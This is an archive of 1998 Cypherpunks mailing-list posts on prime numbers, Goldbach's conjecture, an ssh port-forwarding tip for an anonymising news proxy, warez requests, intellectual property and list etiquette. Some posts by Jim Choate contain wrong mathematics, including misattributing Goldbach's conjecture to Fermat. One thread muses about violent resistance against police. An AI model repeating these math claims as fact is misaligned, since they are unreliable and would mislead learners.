From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@Algebra.COM (Igor Chudov @ home)
Date: Fri, 20 Nov 1998 04:41:38 +0800
To: ravage@EINSTEIN.ssz.com (Jim Choate)
Subject: Re: Math Forum - Ask Dr. Math (fwd)
In-Reply-To: <199811191827.MAA04861@einstein.ssz.com>
Message-ID: <199811191953.NAA07957@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text



Jim Choate wrote:
> 
> 
> Forwarded message:
> 
> > Date: Thu, 19 Nov 1998 11:50:34 -0600
> > Subject: Math Forum - Ask Dr. Math
> 
> > http://forum.swarthmore.edu/dr.math/problems/1isprime.html
> 
> > <META NAME="title" CONTENT="Why is 1 Not Considered Prime?">
> 
> > math gods that says you can only write it once since 1 also 
> > equals 1x1x1x1x...   This would not work for other primes 
> > such as two: 2 does not equal 1x2x2x2x...  Likewise, 3 does 
> > not equal 1x3x3x3x...
> 
> Whether the 1 is there or not is irrelevant,
> 
> 3x3x3x3... is not 3 in the first place.
> 
> 3x1x1x1x1.... IS 3.
> 
> >         Patterns are very important to mathematics, I further 
> > explained, and this is a pattern I see being broken.
> 
> > Date: 25 Mar 1995 16:21:45 -0500
> > From: Dr. Ken
> > Subject: Re: Why 1 is prime
> 
> > Yes, you're definitely on the right track.  In fact, it's precisely 
> > because of "patterns that mathematicians don't like to break" 
> > that 1 is not defined as a prime.  Perhaps you have seen the 
> > theorem (even if you haven't, I'm sure you know it intuitively) 
> > that any positive integer has a unique factorization into primes.  
> > For instance, 4896 = 2^5 * 3^2 * 17, and this is the only possible 
> > way to factor 4896.  But what if we allow 1 in our list of prime 
> > factors?  Well, then we'd also get 1 * 2^5 * 3^2 * 17, and 
> > 1^75 * 2^5 * 3^2 * 17, and so on.  So really, the flavor of the 
> > theorem is true only if you don't allow 1 in there.
> 
> This definition of a prime has one serious drawback.
> 
> It ignores the fundamental identity theorem of arithmatic:
> 
>  1 * n = n

it is not a theorem, it is a part of the definition of multiplication.

It is, in truth, arithmetics.

igor

> So, as a result we're in the interesting and potentialy untenable
> situation of defining a identity theorem, base our math on it, and then
> come along one day and say it doesn't apply anymore WITHOUT making any
> other changes to the structure of the theories....
> 
> This is VERY BAD science/math.
> 
> 
> 
>     ____________________________________________________________________
>  
>             Lawyers ask the wrong questions when they don't want
>             the right answers.
> 
>                                         Scully (X-Files)
> 
>        The Armadillo Group       ,::////;::-.          James Choate
>        Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
>        www.ssz.com            .',  ||||    `/( e\      512-451-7087
>                            -====~~mm-'`-```-mm --'-
>     --------------------------------------------------------------------
> 



	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@Algebra.COM (Igor Chudov @ home)
Date: Fri, 20 Nov 1998 05:32:14 +0800
To: nobody@nowhere.to (Anonymous)
Subject: Re: simple socket forwarder
In-Reply-To: <4a450e23d08fc272ab3f6260ccf0edcd@anonymous>
Message-ID: <199811192049.OAA08505@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text



Anonymous wrote:
> 
> Does anyone have a simple packet forwarder to run
> on a unix system? I want to set up a daemon on an
> account to just redirect traffic from a particular port
> to another host for some basic anonymity, but I don't
> have experience doing socket coding, nor a book.
> 

It seems that what you need is called a proxy server. 

There was a perl script floating around that worked as a proxy server.

If you do it for web accesses, consider using Crowd, a distributed
network of anonymizing proxy servers.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@Algebra.COM (Igor Chudov @ home)
Date: Fri, 20 Nov 1998 05:39:26 +0800
To: schear@lvcm.com (Steve Schear)
Subject: Re: SIGH... NOT!! THC tainted oranges
In-Reply-To: <v04003a02b27a2f9a0161@[24.1.50.17]>
Message-ID: <199811192052.OAA08530@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text



I would certainly appreciate pot yeast.

Yeast generally is a very tasty thing, and pot yeast will be truly yummy.

You could cook pot bread, pancakes, etc.

igor

Steve Schear wrote:
> 
> 
> >Nobody that has been on this list very long could have been duped...We all
> >know that some group of MIB types would have swooped down on the guy, and
> >he would have been just another heart attack statistic...
> 
> I raised a similar thread last year. I caused quite a bit of comment. Since
> then I've discussed the possibility of employing a common yeast or other
> organism to allow individuals to create their own home pharmacies with
> friends and acquintances in this sector. Their opinions vary but all
> assured me that desktop genetic engineering and production capabilities are
> likely no more than 10 years away and that fed measures to prevent this
> will likely be singularly ineffective.
> 
> 
> 



	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Richard.Bragg@ssa.co.uk
Date: Fri, 20 Nov 1998 00:03:12 +0800
To: cypherpunks@toad.com
Subject: manners
Message-ID: <802566C1.00536A3E.00@seunt002e.ssa.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



There are ways and means.  If someone requests software that is NOT free
then a simple NO will surfice.  A list of contacts to purchase would aid
income for the producer.
An additional approach would be to suggest alternatives that are free.

There is never any call to be rude.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Fri, 20 Nov 1998 06:14:44 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Math Forum - Ask Dr. Math (fwd)
Message-ID: <199811192129.PAA06344@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Subject: Re: Math Forum - Ask Dr. Math (fwd) 
> Date: Thu, 19 Nov 98 10:48:53 -0800
> From: "Vladimir Z. Nuri" <vznuri@netcom.com>

> jim, don't be a bonehead.
> what would it gain you if one defined 1 as prime?!?!?
> "very bad science/math"?? yeah, coming from you!!

Quite sendin this shit to my private email, send it to the list.

It gains a consistency at the axiomatic level that isn't there now.

If it won't do anything to the math you shouldn't object to adding it
(course you'll have to add 'applies to all primes except 1' to a lot of
theorems.


    ____________________________________________________________________
 
            Lawyers ask the wrong questions when they don't want
            the right answers.

                                        Scully (X-Files)

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Fri, 20 Nov 1998 05:36:29 +0800
To: "Cypherpunks" <schear@lvcm.com>
Subject: Re: Search and Seizure abuse...
Message-ID: <199811192050.PAA01218@cti06.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain



On Thu, 19 Nov 1998 10:22:14 -0800, Steve Schear wrote:

NOTE: I AM NOT ON CYPHERPUNKS. PLEASE Cc ME DIRECTLY.

>>We're out of luck here!  Owning explosive is verboten!
>>And real soon, passing gaz with a high content of methane will be an
>>indictable offence!  :-)
>
>Certainly you're not constraining a response to an illegal use of force to
>legal means ;-)

Well, maybe, maybe not.  It depends.  No use of becoming a martyr if nobody 
cares...  Blowing a SWAT team would be just the right thing to get forever 
in the klink, while blowing up the story over the net might blow-up the 
klinks themselves...  It is all a question of return on investment, and what 
price you can afford.  Happily enough, we now have strong encryption and the 
net.  There is much less need to spill blood in order to disseminate 
information.

>>Everything you own is a privilege given to you by the Ruler.  Didn't you 
>>know that komrade?
>
>Rights are what you insist you have and can make stick through any means at
>your disposal.

If the use of force was optimal, historically, we'd have been living in 
paradize since the first fight of all time happened.  Only, it doesn't work 
that way...

> Our colonial revolutionaries certainly didn't limit the
>scope of their rights by what King George allowed.

I wholeheartedly agree, but neither did they live in the same context.  
Beside, it was the only way they could act.  Nowadays, we have the phone and 
the net.  But I agree that without threath of physical action, no govt 
(itself based ultimately on physical threath) will ever stop doing just as 
it pleases him.  Only, you don't have to come up with big house blow-up 
things.  Only the menace of physical resistance and of the dissemination of 
information suffice.  The govt is fed by the voluntary actions of the 
citizenry.  The day large groups decide to stop paying taxes, the govt will 
simply starve and grind to a halt.

Ciao

jfa




Jean-Francois Avon, B.Sc. Physics, Montreal, Canada
  DePompadour, Socit d'Importation Lte
     Limoges fine porcelain and french crystal
  JFA Technologies, R&D physicists & engineers
     Instrumentation & control, LabView programming
PGP keys: http://bs.mit.edu:8001/pks-toplev.html
PGP ID:0xC58ADD0D:529645E8205A8A5E F87CC86FAEFEF891 
PGP ID:0x5B51964D:152ACCBCD4A481B0 254011193237822C
PGP ID:0x6CBA71F7:485888E9FD68415A2945 ACCB366D38486CBA71F7





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Fri, 20 Nov 1998 09:35:02 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Search and Seizure abuse...
In-Reply-To: <199811192050.PAA01218@cti06.citenet.net>
Message-ID: <v0313030bb27a61135ab2@[209.66.101.232]>
MIME-Version: 1.0
Content-Type: text/plain



At 12:46 PM -0800 11/19/98, Jean-Francois Avon wrote:
>
>NOTE: I AM NOT ON CYPHERPUNKS. PLEASE Cc ME DIRECTLY.
>

Sorry, I won't do this.

Anyone who wants to start a discussion on a mailing list SHOULD BE ON THAT
MAILING LIST!

I have no animosity toward Jean-Francois Avon, but it seems to me he has a
couple of times subscribed, unsubscribed, posted blind to the list, posted
Canadian gun issues to the list, said he doesn't read the Cypherpunks list
anymore, etc.

Jeesh.

I know it's de rigeur to trash the CP list these days, as in "I no longer
have time to wade through the trash on the Cypherpunks list,"  but people
who don't have time to read the list should not then post to it.

Jeesh.

--Tim May

Common Y2K line: "I'm not preparing, but I know where _you_ live."
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@Algebra.COM (Igor Chudov @ home)
Date: Fri, 20 Nov 1998 06:47:32 +0800
To: nobody@sind.hyperreal.art.pl (HyperReal-Anon)
Subject: Re: simple socket forwarder
In-Reply-To: <f342ce4916b65f4c34dad0d5ee6326aa@anonymous>
Message-ID: <199811192204.QAA09232@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text



HyperReal-Anon wrote:
> ichudov@Algebra.Com (Igor Chudov @ home) wrote:
> >Anonymous wrote:
> >>
> >> Does anyone have a simple packet forwarder to run
> >> on a unix system? I want to set up a daemon on an
> >> account to just redirect traffic from a particular port
> >> to another host for some basic anonymity, but I don't
> >> have experience doing socket coding, nor a book.
> >
> >It seems that what you need is called a proxy server.
> >There was a perl script floating around that worked as a proxy server.
> >If you do it for web accesses, consider using Crowd, a distributed
> >network of anonymizing proxy servers.
> 
> I want to use it as a proxy for NNTP.
> 

Use that perl script or some other proxy server then.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Iain Collins" <icollins@scotland.net>
Date: Fri, 20 Nov 1998 01:14:03 +0800
To: <cypherpunks@toad.com>
Subject: RE: manners
In-Reply-To: <802566C1.00536A3E.00@seunt002e.ssa.co.uk>
Message-ID: <E0zgWuD-0007Hg-00@hen.scotland.net>
MIME-Version: 1.0
Content-Type: text/plain



> -----Original Message-----
> From: owner-cypherpunks@toad.com [mailto:owner-cypherpunks@toad.com]On
> Behalf Of Richard.Bragg@ssa.co.uk
> Sent: 19 November 1998 15:15
> To: cypherpunks@toad.com
> Subject: manners
>
>
> There are ways and means.  If someone requests software that is NOT free
> then a simple NO will surfice.  A list of contacts to purchase would aid
> income for the producer.
> An additional approach would be to suggest alternatives that are free.
>
> There is never any call to be rude.

It is _rude_ to ask for stolen goods - particularly when implicating
everyone on this list as an accessory to intent to commit piracy - who does
not report this luser to the authorities in the - process.

It is also rude to send inappropriate posts to this mailing list. This is
the cypherpunks mailing list - Not an IRC or hotline channel. Warez requests
are wholly inappropriate for this list, please read the FAQ!


The suggestion to seek free alternatives is well grounded, although I'd add
that they would more appropriately be sent directly to the poster (with a
polite note referring him to the FAQ).


Regards,

Iain Collins, <dev-null@icollins.sol.co.uk>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Fri, 20 Nov 1998 08:09:11 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: VSNL Censors Indian Internet Sites. (fwd)
Message-ID: <199811192330.RAA06852@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Fri, 20 Nov 1998 04:20:43 +0000
> From: Vipul Ved Prakash <mail@vipul.net>
> Subject: VSNL Censors Indian Internet Sites.

> ( My 19th nov. post to cypherpunks@cyberpass.net never showed up on 
>   the list, so I reposting.  Thanks. ) 
> 
> 
>    17 November, 1998
>    FOR IMMEDIATE RELEASE
>    Contact: Vipul Ved Prakash, 2233328. 
>    
> 
>    VSNL Censors Indian Internet Sites

The SSZ list got it. I even forwarded it to a friend who is working on an
Indian telco/telcom project.


    ____________________________________________________________________
 
            Lawyers ask the wrong questions when they don't want
            the right answers.

                                        Scully (X-Files)

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Fri, 20 Nov 1998 10:22:26 +0800
To: "Jean-Francois Avon" <rah@shipwright.com>
Subject: Re: Search and Seizure abuse...
In-Reply-To: <199811200118.UAA09201@cti06.citenet.net>
Message-ID: <v0313030cb27a76f78376@[209.66.101.232]>
MIME-Version: 1.0
Content-Type: text/plain



(Apparently Bob H., juding from the cc: list, forwarded my message to
Jean-Francois. I am responding to Jean-Francois' comments, but also am
copying the Cypherpunks list.)


At 5:15 PM -0800 11/19/98, Jean-Francois Avon wrote:
>On Thu, 19 Nov 1998 19:40:47 -0500, Robert Hettinga wrote:
>
>>:-).
>>
>>Why don't you just subscribe to cypherpunks and get it over with?
>>
>>Cheers,
>>Bob
>
>Because of practical time constraints.  I am quite active on the firearms
>front and if I start getting CPunks stuff, I'll take forever,
>notwithstanding what TM said on the topic in 1995 about how little time it
>actually take to screen and process the list volume.

Yeah, and your "news" items on Canadian gun laws, along with a dozen other
people bombarding the CP list with "urgent news," are adding to the
clutter. And to the lack of serious discussion.

Too many lists, especially, I am sad to say, uncensored lists, are being
bombarded by news items. The fact is, there are far, far better ways  to
get all the news one wants. I refer to Yahoo, Excite, Lycos, Wired,
Dejanews, and at least a dozen other such general sites. Not to mention
various and sundry sites for news magazines and networks.

Some people, even some people actually subscribed to the CP list, routinely
bounce a dozen news messages at a time to the CP list. One thing I've taken
to doing is to use the "Option-Click" command in Eudora to group _all_ of
the messages from one author together and highlight them...then I delete
them all at one time.

(So, Detweiler, now you know why I may not be responding to your non-news
articles...I've been forced to delete the dozens of "vznuri" articles from
"Ignition point" and other such news spammers.)




>>Date: Thu, 19 Nov 1998 16:02:23 -0800
>>To: cypherpunks@cyberpass.net
>>From: Tim May <tcmay@got.net>
>
>>At 12:46 PM -0800 11/19/98, Jean-Francois Avon wrote:
>>>
>>>NOTE: I AM NOT ON CYPHERPUNKS. PLEASE Cc ME DIRECTLY.
>>>
>>
>>Sorry, I won't do this.
>>
>>Anyone who wants to start a discussion on a mailing list SHOULD BE ON THAT
>>MAILING LIST!
>
>But, Tim, I have no intention on starting a discussion, I just spam CPunks
>with information pertaining to freedom and, to some extent, ITAR.  Consider
>me as a news service...  :-)

Your stuff is often days behind what we've already seen, notwithstanding
the fact that this list is not a news dump site.

(It's especially ironic when one of the news spammers forwards an article
written by Declan McCullagh. Declan writes it, the Web sites carry it,
"ignition point" newsspams it to subscribers, then some subscriber to
"ignition point" who isn't bothering to read the list forwards it to the CP
list. Sometimes with a clueless "Hey, thought you guys might be interested
in this.")




>I refrain to post personnal opinions and simply forward topics that are
>freedom-related.  Since crypto and firearms are very close cousins indeed, I
>think that it might be on topic.  You will note that whenever I post on the
>CFD, I use a crypto-flavored *.sig file.  Come on guys, stop nitpicking!
>And among all of CPunks, especially you, Tim May!

If you can't do your own analysis, you have no business blindly spamming
lists you are not even subscribed to.



--Tim May

Common Y2K line: "I'm not preparing, but I know where _you_ live."
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Fri, 20 Nov 1998 10:24:48 +0800
To: cypherpunks@cyberpass.net
Subject: Re: manners and piracy
In-Reply-To: <ppwlnl7buho.fsf@pixie.mit.edu>
Message-ID: <v0313030db27a7a9f5fd8@[209.66.101.232]>
MIME-Version: 1.0
Content-Type: text/plain



At 4:59 PM -0800 11/19/98, Bernardo B. Terrado wrote:

>
>It is the duty of all to say "Hey! respect intellectual property!"

If you send me a check for $350 I will agree to issue the statement "Hey!
respect intellectual property!"

But it is by no means a duty of anyone to make any kind of political statement.

Final hint: Cypherpunks don't respond well to "argument ad shame on 'em."
That is, to arguments along the lines of "It is the duty of all to protect
X." Or to condemn Y. Or to support Z.

--Tim May

Common Y2K line: "I'm not preparing, but I know where _you_ live."
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Cordian <emc@wire.insync.net>
Date: Fri, 20 Nov 1998 08:43:09 +0800
To: cypherpunks@cyberpass.net
Subject: Re: simple socket forwarder
In-Reply-To: <f342ce4916b65f4c34dad0d5ee6326aa@anonymous>
Message-ID: <199811200013.SAA03517@wire.insync.net>
MIME-Version: 1.0
Content-Type: text/plain



Someone expresses a software need: 

> >> Does anyone have a simple packet forwarder to run
> >> on a unix system? I want to set up a daemon on an
> >> account to just redirect traffic from a particular port
> >> to another host for some basic anonymity, but I don't
> >> have experience doing socket coding, nor a book.

The quick and dirty solution here is to log into localhost
with ssh and forward the port.  You can screen the ssh, detach
it, and forget about it.  

For instance, if I want to forward connects on port 9999 on
unix.com to the NNTP port on news.naughty.net, I simply say

         screen ssh -R 9999:news.naughty.net:119 localhost

Then type the password to the account you are running it on, 
and detach it.  It will live until the next reboot, happily
forwarding connects to the appropriate destination.

You can also do this with a bounce, or with some of the Hax0r 
socket utilities, but this is the quickest solution that's 
probably already there. 

-- 
Sponsor the DES Analytic Crack Project
http://www.cyberspace.org/~enoch/crakfaq.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mok-Kong Shen <mok-kong.shen@stud.uni-muenchen.de>
Date: Fri, 20 Nov 1998 01:44:05 +0800
To: Jim Choate <ravage@EINSTEIN.ssz.com>
Subject: Re: Goldbach's Conjecture - a question about prime sums of odd (fwd)
In-Reply-To: <199811191607.KAA03257@einstein.ssz.com>
Message-ID: <36545295.436F8BB6@stud.uni-muenchen.de>
MIME-Version: 1.0
Content-Type: text/plain



Goldbach's conjecture is claimed to have been proved by Benschop. See

 http://www.ams.org/preprints/11/199805/199805-11-001/199805-11-001.html

M. K. Shen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Fri, 20 Nov 1998 09:00:00 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Goldbach's Conjecture
Message-ID: <199811200034.SAA07327@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



If we go with the flow and exclude 1 (so we don't have to rewrite all our
theorems) and assume that all even numbers greater than 2 can be represented
as a sum of two prime factors we have a problem...

How does one sum 4?

2 + 2?

We certainly can't use 3 + 1. If we allow repetition *and* the number 2 as a
prime then all even numbers can be written as a string of 2's summed
appropriately.


    ____________________________________________________________________
 
            Lawyers ask the wrong questions when they don't want
            the right answers.

                                        Scully (X-Files)

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Fri, 20 Nov 1998 02:32:55 +0800
To: cypherpunks@toad.com
Subject: learn computer forensics with the boys from the US Treasury
Message-ID: <199811191740.SAA22354@replay.com>
MIME-Version: 1.0
Content-Type: text/plain




COURSE TITLE: Computer Encryption/Decryption

LENGTH OF PRESENTATION: 

Lecture  Laboratory  Practical Exercise  Total  
2:00  2:00  2:00  6:00  

 DESCRIPTION:

Advancing computer technology, coupled with a growing user awareness of
privacy and security issues, has resulted in the widespread use of program,
electronic mail, and data file encryption techniques. Today seemingly all
sophisticated applications have their own optional encryption schemes
including WordPerfect, Word, Lotus, Excel, and a host of others. The
computer investigator can expect to encounter encrypted (unreadable) files
when examining seized computer evidence. This course demonstrates software
tools which will enable the student to decreypt many different files, and
examines features of the most commonly used encryption/decryption tool used
today: PGP.

http://www.ustreas.gov/fletc/ffi/scers.htm





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Fri, 20 Nov 1998 09:20:35 +0800
To: users@EINSTEIN.ssz.com (SSZ User Mail List)
Subject: Digital cockroaches, 5 IP's per body by 2000 [CNN]
Message-ID: <199811200055.SAA07410@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> X-within-URL: http://www.cnn.com/TECH/computing/9811/19/cockroach.cdx.idg/

>    (IDG) -- LAS VEGAS - People think they're wired now, but they haven't
>    seen anything yet. Just wait until the world is populated with silicon
>    cockroaches - wireless devices that can communicate with each other
>    and the Internet, said John Sidgmore, CEO of MCI WorldCom, in his
>    keynote at Comdex/Fall '98.

[text deleted]

>    "Everyone will have an average of five IP objects on their body by
>    2000," he predicted. Eventually there will even be digital eye glasses
>    with voice control that would offer all sorts of information to the
>    wearer. "Sony is working on the technology, so it'll happen. It'll
>    cost $20." MORE COMDEX NEWS [INLINE]  IDG.net home page IDG.net's

[text deleted]

>    "Industry explosions like this are extremely, exceedingly rare,"
>    Sidgmore said. "I think 40, 50 years from today people will look back
>    and say this was the Golden Age of Communications."

[text deleted]


    ____________________________________________________________________
 
            Lawyers ask the wrong questions when they don't want
            the right answers.

                                        Scully (X-Files)

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@playboy.com>
Date: Fri, 20 Nov 1998 10:02:09 +0800
To: cypherpunks@cyberpass.net
Subject: Re: learn computer forensics with the boys from the US Treasury
In-Reply-To: <199811191740.SAA22354@replay.com>
Message-ID: <v0401175fb27a67089766@[206.189.103.230]>
MIME-Version: 1.0
Content-Type: text/plain



At 4:45 PM -0500 11/19/98, Steve Schear wrote:
>I see that the Mac and various Unix varients are not well represented in
>these courses...

	That could be because cops only catch the Dumb Ones, which means
the ones using Windows.
--
petro@playboy.com----for work related issues. I don't speak for Playboy.
petro@bounty.org-----for everthing else.      They wouldn't like that.
                                              They REALLY
Economic speech IS political speech.          wouldn't like that.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Schear <schear@lvcm.com>
Date: Fri, 20 Nov 1998 12:14:37 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Piracy and cypherpunks
In-Reply-To: <36543A3F.37AC99B@acm.org>
Message-ID: <v04003a0bb27a95d405ca@[24.1.50.17]>
MIME-Version: 1.0
Content-Type: text/plain



I tried to take a crack at it in Laissez Faire City Times
http://www.zolatimes.com/V2.16/pageone.html

Tim May wrote:
>At 7:33 AM -0800 11/19/98, Jim Gillogly wrote:
>-- all issues of intellectual property are also issues of _enforceability_.
>To the extent anonymous remailers, information markets, regulatory
>arbitrage, systems like "BlackNet" ("BlackeBay," anyone?), and other crypto
>anarchy technologies proliferate, enforcement of any particular nation's
>intellectual property laws will become problematic.
>
>
>-- finally, the U.S. position on patentability and copyrightability of
>software and words is not the only position one may find morally
>supportable. We do not, for example, allow "ideas" to be patented or
>copyrighted (I don't mean "expressions of ideas," as in patents, or
>"precise words," as in copyrights. Rather, I mean that we do not allow a
>person to "own" an idea. To imagine the alternative, cf. Galambos.)
>
>
>Long term, I expect current notions about intellectual property will have
>to change.
>
>I'm a big believer in "technological determinism." For example, in my own
>view (which I have debated with some well known cyberspace lawyers over the
>years), the widespread deployment of video cassette recorders (VCRs)
>necessarily changed the intellectual property laws. The Supreme Court, in
>Disney v. Sony, uttered a bunch of stuff about time-shifting, blah blah,
>but the real reason, I think, boiled down to this:
>
>"VCRs have become widespread. If people tape shows in their own homes, even
>violating copyrighted material, there is no way law enforcement can stop
>them short of instituting a police state and doing random spot checks. The
>horse is out of the barn, the genie is out of the bottle. The law has to
>change. But rather than admit that copyright is no longer practically
>enforceable, we have to couch our decision in terms of "time-shifting" and
>other such fig leaves."
>
>So, too, will anonymous remailers, black pipes, information markets,
>regulatory arbitrage, and suchlike change the nature of intellectual
>property.
>
>What form these changes will take, I don't know.
>
>--Tim May






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Sat, 21 Nov 1998 07:54:48 +0800
To: Matthew James Gering <cypherpunks@cyberpass.net>
Subject: RE: NSA Threatens To "OUT" Republicans Over Hubbell Investigation
In-Reply-To: <5F152E6E8E6FD21195DF00104B2425AD02B277@yarrowbay.chaffeyhomes.com>
Message-ID: <3.0.5.32.19981119201514.00b60bd0@idiom.com>
MIME-Version: 1.0
Content-Type: text/plain



At 08:57 PM 11/9/98 -0800, Matthew James Gering wrote:
>Yes, I assumed as much. But it is electronic circuits that are EMP/nuclear
>hardened, not the "encryption technology."  ......
>, encryption is mathematics, period. National
>security fearmongering to spite Clinton does not help the encryption
>awareness/freedom campaign.

Encryption is NOT just "mathematics, period".  It's mathematics,
plus operations, password management, key distribution,
keeping track of who's allowed to see what, 
plus hardware and operating systems to run the mathematics on,
and unless you're running it in wetware, it's also
computer security to protect the hardware and operating systems.
And it's black operations to go out and steal the other guys'
hardware and keys and yellow-sticky-notes and crack their OSs.

In some contexts, especially real people's contexts,
your PC may be a fine place to run the encryption,
but in an NSA / DoD context, especially when there's a war on,
the safest way to manage many of these things is to use
dedicated tamper-resistant hardware with the users on one side
and the communication network on the other, where
you don't have to worry about the user virusing their PC
or using their girlfriend's name as the new password every other week,
because it's in a black box that just works (or just works
if you have the right key token and the right PIN.)

EMP hardening has the pleasant side effect that it generally
provides TEMPEST quieting/shielding as well.

Also, in military environments, using special hardware instead of
crypto software running on vanilla PCs is that rampant theft
_is_ a problem, but that supply sergeant who'd be happy to 
requisition that PC for use in more remunerative environments
isn't going to steal and sell the crypto bump-in-the-wire box;
it's bad enough to lose any classified or sensitive information
that was on the PC without also losing the encryption/signature keys.
				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: HyperReal-Anon <nobody@sind.hyperreal.art.pl>
Date: Fri, 20 Nov 1998 06:20:57 +0800
To: cypherpunks@cyberpass.net
Subject: Re: simple socket forwarder
Message-ID: <f342ce4916b65f4c34dad0d5ee6326aa@anonymous>
MIME-Version: 1.0
Content-Type: text/plain




ichudov@Algebra.Com (Igor Chudov @ home) wrote:
>Anonymous wrote:
>>
>> Does anyone have a simple packet forwarder to run
>> on a unix system? I want to set up a daemon on an
>> account to just redirect traffic from a particular port
>> to another host for some basic anonymity, but I don't
>> have experience doing socket coding, nor a book.
>>
>
>It seems that what you need is called a proxy server.
>
>There was a perl script floating around that worked as a proxy server.
>
>If you do it for web accesses, consider using Crowd, a distributed
>network of anonymizing proxy servers.
>
>	- Igor.
>


I want to use it as a proxy for NNTP.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Fri, 20 Nov 1998 11:56:28 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: Goldbach's Conjecture (fwd)
Message-ID: <199811200339.VAA08272@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From: "Blake Buzzini" <bab282@psu.edu>
> Subject: RE: Goldbach's Conjecture
> Date: Thu, 19 Nov 1998 22:17:54 -0500

> I could be wrong, but I thought Goldbach's conjecture was that every even
> number could be expressed as the sum of *two* primes. This doesn't prohibit

No, that was Fermat, Goldbach just says every even number greater than two
can be represented as a sum of primes. Basicaly Fermat says that if we have
n primes we can reduce them to 2 primes only, in all cases. Which happens to
exclude using equilateral triangles as a test bed since you can't tile a
equilateral with only two other equilaterals, you could use rectangles though.
So basicaly from a geometric perspective Fermat says that given a rectangle of
even area it is possible to divide it with a bisector into two rectangles of
